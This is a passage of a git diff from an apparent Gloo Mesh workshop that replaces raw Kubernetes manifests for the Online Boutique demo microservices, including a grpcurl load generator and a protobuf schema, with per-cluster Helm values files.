tag whose default is the chart appVersion. + tag: "1.3" + +serviceAccounts: + # Specifies whether service accounts should be created. + create: true + +shippingService: + create: false + +checkoutService: + create: false + +paymentService: + create: false + +frontend: + create: false + +loadGenerator: + create: false + +adService: + create: true + +cartService: + create: true + +currencyService: + create: true + +emailService: + create: true + +productCatalogService: + create: true + +recommendationService: + create: true + +cartDatabase: + inClusterRedis: + create: true \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/backend-apis.yaml b/workshops/gloo-mesh-demo/install/online-boutique/backend-apis.yaml deleted file mode 100644 index afc3490..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/backend-apis.yaml +++ /dev/null @@ -1,362 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: backend-apis - labels: - istio-injection: enabled ---- -########################################################### -## Services -########################################################### ---- -apiVersion: v1 -kind: Service -metadata: - name: recommendationservice - namespace: backend-apis - labels: - app: recommendationservice -spec: - type: ClusterIP - selector: - app: recommendationservice - ports: - - name: grpc - port: 8080 - targetPort: 8080 ---- -apiVersion: v1 -kind: Service -metadata: - name: productcatalogservice - namespace: backend-apis - labels: - app: productcatalogservice -spec: - selector: - app: productcatalogservice - ports: - - name: grpc - port: 3550 - targetPort: 3550 ---- -apiVersion: v1 -kind: Service -metadata: - name: emailservice - namespace: backend-apis - labels: - app: emailservice -spec: - selector: - app: emailservice - ports: - - name: grpc - port: 5000 - targetPort: 8080 ---- -apiVersion: v1 -kind: Service -metadata: - name: currencyservice - namespace: backend-apis - labels: - app: currencyservice -spec: - selector: - app: currencyservice - ports: - - name: grpc - port: 7000 - targetPort: 7000 ---- -apiVersion: v1 -kind: Service -metadata: - name: cartservice - namespace: backend-apis - labels: - app: cartservice -spec: - selector: - app: cartservice - ports: - - name: grpc - port: 7070 - targetPort: 7070 ---- -apiVersion: v1 -kind: Service -metadata: - name: adservice - namespace: backend-apis - labels: - app: adservice -spec: - selector: - app: adservice - ports: - - name: grpc - port: 9555 - targetPort: 9555 ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: recommendation - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: recommendationservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: recommendationservice - template: - metadata: - labels: - app: recommendationservice - spec: - serviceAccountName: recommendation - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/recommendationservice:solo-build - ports: - - containerPort: 8080 - readinessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:8080"] - livenessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:8080"] - env: - - name: PORT - value: "8080" - - name: PRODUCT_CATALOG_SERVICE_ADDR - value: "productcatalogservice.backend-apis.svc.cluster.local:3550" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: DISABLE_DEBUGGER - value: "1" ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: product-catalog - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: productcatalogservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: productcatalogservice - template: - metadata: - labels: - app: productcatalogservice - spec: - serviceAccountName: product-catalog - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/productcatalogservice:solo-build - ports: - - containerPort: 3550 - env: - - name: PORT - value: "3550" - - name: DISABLE_STATS - value: "1" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - readinessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:3550"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:3550"] ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: email - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: emailservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: emailservice - template: - metadata: - labels: - app: emailservice - spec: - serviceAccountName: email - containers: - - name: server - image: gcr.io/solo-test-236622/emailservice:solo-build - ports: - - containerPort: 8080 - env: - - name: PORT - value: "8080" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - readinessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:8080"] - livenessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:8080"] ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: currency - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: currencyservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: currencyservice - template: - metadata: - labels: - app: currencyservice - spec: - serviceAccountName: currency - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/currencyservice:solo-build - ports: - - name: grpc - containerPort: 7000 - env: - - name: PORT - value: "7000" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: DISABLE_DEBUGGER - value: "1" - readinessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:7000"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:7000"] ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: cart - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: cartservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: cartservice - template: - metadata: - labels: - app: cartservice - spec: - serviceAccountName: cart - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/cartservice:solo-build - ports: - - containerPort: 7070 - env: - - name: REDIS_ADDR - value: "" - readinessProbe: - initialDelaySeconds: 15 - exec: - command: ["/bin/grpc_health_probe", "-addr=:7070", "-rpc-timeout=5s"] - livenessProbe: - initialDelaySeconds: 15 - periodSeconds: 10 - exec: - command: ["/bin/grpc_health_probe", "-addr=:7070", "-rpc-timeout=5s"] ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: ad - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: adservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: adservice - template: - metadata: - labels: - app: adservice - spec: - serviceAccountName: ad - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/adservice:solo-build - ports: - - containerPort: 9555 - env: - - name: PORT - value: "9555" - - name: DISABLE_STATS - value: "1" - - name: DISABLE_TRACING - value: "1" - readinessProbe: - initialDelaySeconds: 20 - periodSeconds: 15 - exec: - command: ["/bin/grpc_health_probe", "-addr=:9555"] - livenessProbe: - initialDelaySeconds: 20 - periodSeconds: 15 - exec: - command: ["/bin/grpc_health_probe", "-addr=:9555"] diff --git a/workshops/gloo-mesh-demo/install/online-boutique/checkout-feature.yaml b/workshops/gloo-mesh-demo/install/online-boutique/checkout-feature.yaml deleted file mode 100644 index 06cedb4..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/checkout-feature.yaml +++ /dev/null @@ -1,554 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: backend-apis - labels: - istio-injection: enabled ---- -########################################################### -## Services -########################################################### -apiVersion: v1 -kind: Service -metadata: - name: shippingservice - namespace: backend-apis - labels: - app: shippingservice -spec: - type: ClusterIP - selector: - app: shippingservice - ports: - - name: grpc - port: 50051 - targetPort: 50051 ---- -apiVersion: v1 -kind: Service -metadata: - name: paymentservice - namespace: backend-apis - labels: - app: paymentservice -spec: - selector: - app: paymentservice - ports: - - name: grpc - port: 50051 - targetPort: 50051 ---- -apiVersion: v1 -kind: Service -metadata: - name: checkoutservice - namespace: backend-apis - labels: - app: checkoutservice -spec: - selector: - app: checkoutservice - ports: - - name: grpc - port: 5050 - targetPort: 5050 ---- -########################################################### -## Deployments -########################################################### -apiVersion: v1 -kind: ServiceAccount -metadata: - name: shipping - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: shippingservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: shippingservice - template: - metadata: - labels: - app: shippingservice - spec: - serviceAccountName: shipping - containers: - - name: server - image: gcr.io/solo-test-236622/shippingservice:solo-build - ports: - - containerPort: 50051 - env: - - name: PORT - value: "50051" - - name: DISABLE_STATS - value: "1" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - # - name: JAEGER_SERVICE_ADDR - # value: "jaeger-collector:14268" - readinessProbe: - periodSeconds: 5 - exec: - command: ["/bin/grpc_health_probe", "-addr=:50051"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:50051"] - resources: - requests: - cpu: 100m - memory: 64Mi ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: payment - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: paymentservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: paymentservice - template: - metadata: - labels: - app: paymentservice - spec: - serviceAccountName: payment - terminationGracePeriodSeconds: 5 - containers: - - name: server - image: gcr.io/solo-test-236622/paymentservice:solo-build - ports: - - containerPort: 50051 - env: - - name: PORT - value: "50051" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: DISABLE_DEBUGGER - value: "1" - readinessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:50051"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:50051"] - resources: - requests: - cpu: 100m - memory: 64Mi ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: checkout - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: checkoutservice - namespace: backend-apis -spec: - selector: - matchLabels: - app: checkoutservice - template: - metadata: - labels: - app: checkoutservice - spec: - serviceAccountName: checkout - containers: - - name: server - image: gcr.io/solo-test-236622/checkoutservice:solo-build - imagePullPolicy: IfNotPresent - ports: - - containerPort: 5050 - readinessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:5050"] - livenessProbe: - exec: - command: ["/bin/grpc_health_probe", "-addr=:5050"] - env: - - name: PORT - value: "5050" - - name: PRODUCT_CATALOG_SERVICE_ADDR - value: "product-catalog.backend-apis-team.solo-io.mesh:80" - - name: SHIPPING_SERVICE_ADDR - value: "shipping.backend-apis-team.solo-io.mesh:80" - - name: PAYMENT_SERVICE_ADDR - value: "paymentservice.backend-apis.svc.cluster.local:50051" - - name: EMAIL_SERVICE_ADDR - value: "emailservice.backend-apis.svc.cluster.local:5000" - - name: CURRENCY_SERVICE_ADDR - value: "currency.backend-apis-team.solo-io.mesh:80" - - name: CART_SERVICE_ADDR - value: "cart.backend-apis-team.solo-io.mesh:80" - - name: DISABLE_STATS - value: "1" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: KUBERNETES_CLUSTER_NAME - value: cluster2 - # - name: JAEGER_SERVICE_ADDR - # value: "jaeger-collector:14268" - resources: - requests: - cpu: 100m - memory: 64Mi ---- ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: checkout-loadgenerator - namespace: backend-apis ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: checkout-loadgenerator - namespace: backend-apis -spec: - selector: - matchLabels: - app: checkout-loadgenerator - replicas: 1 - template: - metadata: - labels: - app: checkout-loadgenerator - annotations: - sidecar.istio.io/rewriteAppHTTPProbers: "true" - spec: - serviceAccountName: checkout-loadgenerator - terminationGracePeriodSeconds: 5 - restartPolicy: Always - containers: - - name: main - image: golang:1.15.15 - env: - - name: GO111MODULE - value: "on" - command: - - /bin/sh - - -c - - > - go get github.com/fullstorydev/grpcurl/cmd/grpcurl@latest && i=0; - while [ $i -lt 10000 ]; - do - grpcurl --plaintext -d "{ \"userCurrency\": \"USD\", \"creditCard\": { \"creditCardNumber\": \"4432-8015-6152-0454\", \"creditCardCvv\": 123, \"creditCardExpirationYear\": 2023, \"creditCardExpirationMonth\": 12 }, \"address\": { \"streetAddress\": \"1600 Amphitheatre Parkway\", \"zipCode\": 94043, \"city\": \"Mountain View\", \"state\": \"CA\", \"country\": \"United States\" }, \"email\": \"someone@example.com\" }" -v --proto /demo.proto -import-path / checkout.backend-apis-team.solo-io.mesh:80 hipstershop.CheckoutService/PlaceOrder - grpcurl --plaintext -d "{ \"userCurrency\": \"USD\", \"creditCard\": { \"creditCardNumber\": \"4432-8015-6152-0454\", \"creditCardCvv\": 123, \"creditCardExpirationYear\": 2023, \"creditCardExpirationMonth\": 12 }, \"address\": { \"streetAddress\": \"1600 Amphitheatre Parkway\", \"zipCode\": 94043, \"city\": \"Mountain View\", \"state\": \"CA\", \"country\": \"United States\" }, \"email\": \"someone@example.com\" }" -v --proto /demo.proto -import-path / checkoutservice.backend-apis.svc.cluster.local:5050 hipstershop.CheckoutService/PlaceOrder - sleep 1 - done - volumeMounts: - - name: "protos" - mountPath: "/demo.proto" - subPath: "demo.proto" - volumes: - - name: "protos" - configMap: - name: "online-boutique-proto" ---- -apiVersion: v1 -kind: Service -metadata: - name: checkout-loadgenerator - namespace: backend-apis - labels: - app: loadgenerator -spec: - type: ClusterIP - selector: - app: checkout-loadgenerator - ports: - - name: http - port: 80 - targetPort: 8080 ---- -apiVersion: v1 -kind: ConfigMap -metadata: - name: online-boutique-proto - namespace: backend-apis -data: - demo.proto: | - // Copyright 2020 Google LLC - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. - - syntax = "proto3"; - - package hipstershop; - - // -----------------Cart service----------------- - - service CartService { - rpc AddItem(AddItemRequest) returns (Empty) {} - rpc GetCart(GetCartRequest) returns (Cart) {} - rpc EmptyCart(EmptyCartRequest) returns (Empty) {} - } - - message CartItem { - string product_id = 1; - int32 quantity = 2; - } - - message AddItemRequest { - string user_id = 1; - CartItem item = 2; - } - - message EmptyCartRequest { - string user_id = 1; - } - - message GetCartRequest { - string user_id = 1; - } - - message Cart { - string user_id = 1; - repeated CartItem items = 2; - } - - message Empty {} - - // ---------------Recommendation service---------- - - service RecommendationService { - rpc ListRecommendations(ListRecommendationsRequest) returns (ListRecommendationsResponse){} - } - - message ListRecommendationsRequest { - string user_id = 1; - repeated string product_ids = 2; - } - - message ListRecommendationsResponse { - repeated string product_ids = 1; - } - - // ---------------Product Catalog---------------- - - service ProductCatalogService { - rpc ListProducts(Empty) returns (ListProductsResponse) {} - rpc GetProduct(GetProductRequest) returns (Product) {} - rpc SearchProducts(SearchProductsRequest) returns (SearchProductsResponse) {} - } - - message Product { - string id = 1; - string name = 2; - string description = 3; - string picture = 4; - Money price_usd = 5; - - // Categories such as "clothing" or "kitchen" that can be used to look up - // other related products. - repeated string categories = 6; - } - - message ListProductsResponse { - repeated Product products = 1; - } - - message GetProductRequest { - string id = 1; - } - - message SearchProductsRequest { - string query = 1; - } - - message SearchProductsResponse { - repeated Product results = 1; - } - - // ---------------Shipping Service---------- - - service ShippingService { - rpc GetQuote(GetQuoteRequest) returns (GetQuoteResponse) {} - rpc ShipOrder(ShipOrderRequest) returns (ShipOrderResponse) {} - } - - message GetQuoteRequest { - Address address = 1; - repeated CartItem items = 2; - } - - message GetQuoteResponse { - Money cost_usd = 1; - } - - message ShipOrderRequest { - Address address = 1; - repeated CartItem items = 2; - } - - message ShipOrderResponse { - string tracking_id = 1; - } - - message Address { - string street_address = 1; - string city = 2; - string state = 3; - string country = 4; - int32 zip_code = 5; - } - - // -----------------Currency service----------------- - - service CurrencyService { - rpc GetSupportedCurrencies(Empty) returns (GetSupportedCurrenciesResponse) {} - rpc Convert(CurrencyConversionRequest) returns (Money) {} - } - - // Represents an amount of money with its currency type. - message Money { - // The 3-letter currency code defined in ISO 4217. - string currency_code = 1; - - // The whole units of the amount. - // For example if `currencyCode` is `"USD"`, then 1 unit is one US dollar. - int64 units = 2; - - // Number of nano (10^-9) units of the amount. - // The value must be between -999,999,999 and +999,999,999 inclusive. - // If `units` is positive, `nanos` must be positive or zero. - // If `units` is zero, `nanos` can be positive, zero, or negative. - // If `units` is negative, `nanos` must be negative or zero. - // For example $-1.75 is represented as `units`=-1 and `nanos`=-750,000,000. - int32 nanos = 3; - } - - message GetSupportedCurrenciesResponse { - // The 3-letter currency code defined in ISO 4217. - repeated string currency_codes = 1; - } - - message CurrencyConversionRequest { - Money from = 1; - - // The 3-letter currency code defined in ISO 4217. - string to_code = 2; - } - - // -------------Payment service----------------- - - service PaymentService { - rpc Charge(ChargeRequest) returns (ChargeResponse) {} - } - - message CreditCardInfo { - string credit_card_number = 1; - int32 credit_card_cvv = 2; - int32 credit_card_expiration_year = 3; - int32 credit_card_expiration_month = 4; - } - - message ChargeRequest { - Money amount = 1; - CreditCardInfo credit_card = 2; - } - - message ChargeResponse { - string transaction_id = 1; - } - - // -------------Email service----------------- - - service EmailService { - rpc SendOrderConfirmation(SendOrderConfirmationRequest) returns (Empty) {} - } - - message OrderItem { - CartItem item = 1; - Money cost = 2; - } - - message OrderResult { - string order_id = 1; - string shipping_tracking_id = 2; - Money shipping_cost = 3; - Address shipping_address = 4; - repeated OrderItem items = 5; - } - - message SendOrderConfirmationRequest { - string email = 1; - OrderResult order = 2; - } - - - // -------------Checkout service----------------- - - service CheckoutService { - rpc PlaceOrder(PlaceOrderRequest) returns (PlaceOrderResponse) {} - } - - message PlaceOrderRequest { - string user_id = 1; - string user_currency = 2; - - Address address = 3; - string email = 5; - CreditCardInfo credit_card = 6; - } - - message PlaceOrderResponse { - OrderResult order = 1; - } - - // ------------Ad service------------------ - - service AdService { - rpc GetAds(AdRequest) returns (AdResponse) {} - } - - message AdRequest { - // List of important key words from the current page describing the context. - repeated string context_keys = 1; - } - - message AdResponse { - repeated Ad ads = 1; - } - - message Ad { - // url to redirect to when an ad is clicked. - string redirect_url = 1; - - // short advertisement text to display. - string text = 2; - } diff --git a/workshops/gloo-mesh-demo/install/online-boutique/checkout-values.yaml b/workshops/gloo-mesh-demo/install/online-boutique/checkout-values.yaml new file mode 100644 index 0000000..ffd3d20 --- /dev/null +++ b/workshops/gloo-mesh-demo/install/online-boutique/checkout-values.yaml @@ -0,0 +1,59 @@ +clusterName: cluster2 + +endpoints: + productCatalogService: 'product-catalog.backend-apis-team.solo-io.mesh:80' + currencyService: 'currency.backend-apis-team.solo-io.mesh:80' + recommendationService: 'recommendations.backend-apis-team.solo-io.mesh:80' + shippingService: 'shipping.backend-apis-team.solo-io.mesh:80' + checkoutService: 'checkout.backend-apis-team.solo-io.mesh:80' + adService: 'ads.backend-apis-team.solo-io.mesh:80' + cartService: 'cart.backend-apis-team.solo-io.mesh:80' + paymentService: 'paymentservice.backend-apis.svc.cluster.local:50051' + emailService: 'emailservice.backend-apis.svc.cluster.local:5000' + + +images: + repository: gcr.io/solo-test-236622 + # Overrides the image tag whose default is the chart appVersion. + tag: "1.3" + +serviceAccounts: + # Specifies whether service accounts should be created. + create: true + +frontend: + create: false + +loadGenerator: + create: false + +adService: + create: false + +cartService: + create: false + +checkoutService: + create: true + +currencyService: + create: false + +emailService: + create: false + +paymentService: + create: true + +productCatalogService: + create: false + +recommendationService: + create: false + +shippingService: + create: true + +cartDatabase: + inClusterRedis: + create: false \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/httpbin.yaml b/workshops/gloo-mesh-demo/install/online-boutique/httpbin.yaml deleted file mode 100644 index 0b5938d..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/httpbin.yaml +++ /dev/null @@ -1,51 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: web-ui - labels: - istio-injection: enabled ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: in-mesh ---- -apiVersion: v1 -kind: Service -metadata: - name: in-mesh - labels: - app: in-mesh - service: in-mesh -spec: - ports: - - name: http - port: 8000 - targetPort: 80 - selector: - app: in-mesh ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: in-mesh -spec: - replicas: 1 - selector: - matchLabels: - app: in-mesh - version: v1 - template: - metadata: - labels: - app: in-mesh - version: v1 - istio.io/rev: 1-11 - spec: - serviceAccountName: in-mesh - containers: - - image: docker.io/kennethreitz/httpbin - imagePullPolicy: IfNotPresent - name: in-mesh - ports: - - containerPort: 80 \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2-values.yaml b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2-values.yaml new file mode 100644 index 0000000..6ed573b --- /dev/null +++ b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2-values.yaml @@ -0,0 +1,56 @@ +clusterName: cluster2 + +endpoints: + productCatalogService: 'product-catalog.backend-apis-team.solo-io.mesh:80' + currencyService: 'currency.backend-apis-team.solo-io.mesh:80' + recommendationService: 'recommendations.backend-apis-team.solo-io.mesh:80' + shippingService: 'shipping.backend-apis-team.solo-io.mesh:80' + checkoutService: 'checkout.backend-apis-team.solo-io.mesh:80' + adService: 'ads.backend-apis-team.solo-io.mesh:80' + cartService: 'cart.backend-apis-team.solo-io.mesh:80' + +images: + repository: gcr.io/solo-test-236622 + # Overrides the image tag whose default is the chart appVersion. + tag: "1.3" + +serviceAccounts: + # Specifies whether service accounts should be created. + create: true + +frontend: + create: true + +loadGenerator: + create: false + +adService: + create: false + +cartService: + create: false + +checkoutService: + create: false + +currencyService: + create: false + +emailService: + create: false + +paymentService: + create: false + +productCatalogService: + create: false + +recommendationService: + create: false + +shippingService: + create: false + +cartDatabase: + inClusterRedis: + create: false \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2.yaml b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2.yaml deleted file mode 100644 index 088525b..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/web-ui-cluster2.yaml +++ /dev/null @@ -1,132 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: web-ui - labels: - istio-injection: enabled ---- -apiVersion: v1 -kind: Service -metadata: - name: frontend - namespace: web-ui - labels: - app: frontend -spec: - selector: - app: frontend - ports: - - name: http - port: 80 - targetPort: 8080 ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: frontend - namespace: web-ui ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: view-nodes -rules: -- apiGroups: [""] - resources: ["nodes"] - verbs: ["get","list","watch"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: read-nodes -subjects: -- kind: ServiceAccount - name: frontend - namespace: web-ui -roleRef: - kind: ClusterRole - name: view-nodes - apiGroup: rbac.authorization.k8s.io ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: frontend - namespace: web-ui - labels: - checkout-enabled: "true" -spec: - selector: - matchLabels: - app: frontend - template: - metadata: - labels: - app: frontend - annotations: - sidecar.istio.io/rewriteAppHTTPProbers: "true" - spec: - serviceAccountName: frontend - containers: - - name: server - image: gcr.io/solo-test-236622/frontend:solo-build - imagePullPolicy: IfNotPresent - ports: - - containerPort: 8080 - readinessProbe: - initialDelaySeconds: 10 - httpGet: - path: "/_healthz" - port: 8080 - httpHeaders: - - name: "Cookie" - value: "shop_session-id=x-readiness-probe" - livenessProbe: - initialDelaySeconds: 10 - httpGet: - path: "/_healthz" - port: 8080 - httpHeaders: - - name: "Cookie" - value: "shop_session-id=x-liveness-probe" - env: - - name: PORT - value: "8080" - - name: AD_SERVICE_ADDR - value: "ads.backend-apis-team.solo-io.mesh:80" - - name: CART_SERVICE_ADDR - value: "cart.backend-apis-team.solo-io.mesh:80" - - name: RECOMMENDATION_SERVICE_ADDR - value: "recommendations.backend-apis-team.solo-io.mesh:80" - - name: SHIPPING_SERVICE_ADDR - value: "shipping.backend-apis-team.solo-io.mesh:80" - - name: CHECKOUT_SERVICE_ADDR - value: "checkout.backend-apis-team.solo-io.mesh:80" - - name: PRODUCT_CATALOG_SERVICE_ADDR - value: "product-catalog.backend-apis-team.solo-io.mesh:80" - - name: CURRENCY_SERVICE_ADDR - value: "currency.backend-apis-team.solo-io.mesh:80" - # # ENV_PLATFORM: One of: local, gcp, aws, azure, onprem - # # When not set, defaults to "local" unless running in GKE, otherwies auto-sets to gcp - - name: ENV_PLATFORM - value: "onprem" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: KUBERNETES_NODE_NAME - valueFrom: - fieldRef: - fieldPath: spec.nodeName - - name: KUBERNETES_POD_NAME - valueFrom: - fieldRef: - fieldPath: metadata.name - - name: KUBERNETES_NAMESPACE - valueFrom: - fieldRef: - fieldPath: metadata.namespace - - name: KUBERNETES_CLUSTER_NAME - value: cluster2 - # - name: JAEGER_SERVICE_ADDR - # value: "jaeger-collector:14268" diff --git a/workshops/gloo-mesh-demo/install/online-boutique/web-ui-values.yaml b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-values.yaml new file mode 100644 index 0000000..cf2caa3 --- /dev/null +++ b/workshops/gloo-mesh-demo/install/online-boutique/web-ui-values.yaml @@ -0,0 +1,56 @@ +clusterName: cluster1 + +endpoints: + productCatalogService: 'productcatalogservice.backend-apis.svc.cluster.local:3550' + currencyService: 'currencyservice.backend-apis.svc.cluster.local:7000' + recommendationService: 'recommendationservice.backend-apis.svc.cluster.local:8080' + shippingService: 'shipping.backend-apis-team.solo-io.mesh:80' + checkoutService: 'checkout.backend-apis-team.solo-io.mesh:80' + adService: 'adservice.backend-apis.svc.cluster.local:9555' + cartService: 'cartservice.backend-apis.svc.cluster.local:7070' + +images: + repository: gcr.io/solo-test-236622 + # Overrides the image tag whose default is the chart appVersion. + tag: "1.3" + +serviceAccounts: + # Specifies whether service accounts should be created. + create: true + +frontend: + create: true + +loadGenerator: + create: true + +adService: + create: false + +cartService: + create: false + +checkoutService: + create: false + +currencyService: + create: false + +emailService: + create: false + +paymentService: + create: false + +productCatalogService: + create: false + +recommendationService: + create: false + +shippingService: + create: false + +cartDatabase: + inClusterRedis: + create: false \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/online-boutique/web-ui.yaml b/workshops/gloo-mesh-demo/install/online-boutique/web-ui.yaml deleted file mode 100644 index 71c1e69..0000000 --- a/workshops/gloo-mesh-demo/install/online-boutique/web-ui.yaml +++ /dev/null @@ -1,186 +0,0 @@ -apiVersion: v1 -kind: Namespace -metadata: - name: web-ui - labels: - istio-injection: enabled ---- -apiVersion: v1 -kind: Service -metadata: - name: frontend - namespace: web-ui - labels: - app: frontend -spec: - selector: - app: frontend - ports: - - name: http - port: 80 - targetPort: 8080 ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: frontend - namespace: web-ui ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: view-nodes -rules: -- apiGroups: [""] - resources: ["nodes"] - verbs: ["get","list","watch"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: read-nodes -subjects: -- kind: ServiceAccount - name: frontend - namespace: web-ui -roleRef: - kind: ClusterRole - name: view-nodes - apiGroup: rbac.authorization.k8s.io ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: frontend - namespace: web-ui - labels: - app: frontend -spec: - selector: - matchLabels: - app: frontend - template: - metadata: - labels: - app: frontend - annotations: - sidecar.istio.io/rewriteAppHTTPProbers: "true" - spec: - serviceAccountName: frontend - containers: - - name: server - image: gcr.io/solo-test-236622/frontend:solo-build - imagePullPolicy: IfNotPresent - ports: - - containerPort: 8080 - readinessProbe: - initialDelaySeconds: 10 - httpGet: - path: "/_healthz" - port: 8080 - httpHeaders: - - name: "Cookie" - value: "shop_session-id=x-readiness-probe" - livenessProbe: - initialDelaySeconds: 10 - httpGet: - path: "/_healthz" - port: 8080 - httpHeaders: - - name: "Cookie" - value: "shop_session-id=x-liveness-probe" - env: - - name: PORT - value: "8080" - - name: AD_SERVICE_ADDR - value: "adservice.backend-apis.svc.cluster.local:9555" - - name: CART_SERVICE_ADDR - value: "cartservice.backend-apis.svc.cluster.local:7070" - - name: RECOMMENDATION_SERVICE_ADDR - value: "recommendationservice.backend-apis.svc.cluster.local:8080" - - name: SHIPPING_SERVICE_ADDR - value: "shipping.backend-apis-team.solo-io.mesh:80" - - name: CHECKOUT_SERVICE_ADDR - value: "checkout.backend-apis-team.solo-io.mesh:80" - - name: PRODUCT_CATALOG_SERVICE_ADDR - value: "productcatalogservice.backend-apis.svc.cluster.local:3550" - - name: CURRENCY_SERVICE_ADDR - value: "currencyservice.backend-apis.svc.cluster.local:7000" - # # ENV_PLATFORM: One of: local, gcp, aws, azure, onprem - # # When not set, defaults to "local" unless running in GKE, otherwies auto-sets to gcp - - name: ENV_PLATFORM - value: "onprem" - - name: DISABLE_TRACING - value: "1" - - name: DISABLE_PROFILER - value: "1" - - name: KUBERNETES_NODE_NAME - valueFrom: - fieldRef: - fieldPath: spec.nodeName - - name: KUBERNETES_POD_NAME - valueFrom: - fieldRef: - fieldPath: metadata.name - - name: KUBERNETES_NAMESPACE - valueFrom: - fieldRef: - fieldPath: metadata.namespace - - name: KUBERNETES_CLUSTER_NAME - value: cluster1 ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: loadgenerator - namespace: web-ui ---- -apiVersion: apps/v1 -kind: Deployment -metadata: - name: loadgenerator - namespace: web-ui -spec: - selector: - matchLabels: - app: loadgenerator - replicas: 1 - template: - metadata: - labels: - app: loadgenerator - annotations: - sidecar.istio.io/rewriteAppHTTPProbers: 